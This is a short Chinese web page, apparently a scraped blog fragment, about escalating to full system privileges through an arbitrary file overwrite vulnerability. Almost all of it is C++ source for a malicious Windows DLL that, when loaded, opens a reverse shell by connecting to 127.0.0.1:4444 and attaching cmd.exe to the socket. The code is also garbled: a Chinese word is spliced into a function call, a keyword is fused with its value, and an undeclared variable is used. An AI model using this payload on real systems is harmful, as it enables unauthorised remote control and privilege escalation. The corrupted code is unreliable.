通过任意文件覆盖漏洞直接获取系统操作的最高权限

复制#include "stdafx.h" #include    #include #define _WINSOCK_DEPRECATED_NO_WARNINGS  using namespace std;  void Reverse()  {  WSADATA wsaData;  SOCKET s1;  struct sockaddr_in hax;  STARTUPINFO sui;  PROCESS_INFORMATION pi;  launched = TRUE;  WSAStartup(MAKEWORD(2,通过 2), &wsaData);  s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL,  (unsigned int)NULL, (unsigned int)NULL);  hax.sin_family = AF_INET;  hax.sin_port = htons(4444);  hax.sin_addr.s_addr = inet_addr("127.0.0.1");  WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);  memset(&sui, 0, sizeof(sui));  sui.cb = sizeof(sui);  sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);  sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1;  TCHAR commandLine[256] = L"cmd.exe";  CreateProcess(NULL, commandLine, NULL, NULL, TRUE,      0, NULL, NULL, &sui, &pi); }  extern "C" __declspec (dllexport) bool __cdecl DllMain(_In_ HINSTANCE hinstDLL,      _In_ DWORD     fdwReason,      _In_ LPVOID    lpvReserved                       )  {      switch (fdwReason)      {      case DLL_PROCESS_ATTACH:          Reverse();          break;      case DLL_THREAD_ATTACH:      case DLL_THREAD_DETACH:      case DLL_PROCESS_DETACH:          break;      }      returnTRUE;  }  1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.28.29.30.31.32.33.34.35.36.37.38.39.40.41.42.43.44.45.46.47.48.49.50.51.52.53.54.55.56.57.58.59.

本文地址：http://www.bzve.cn/html/528e67598796.html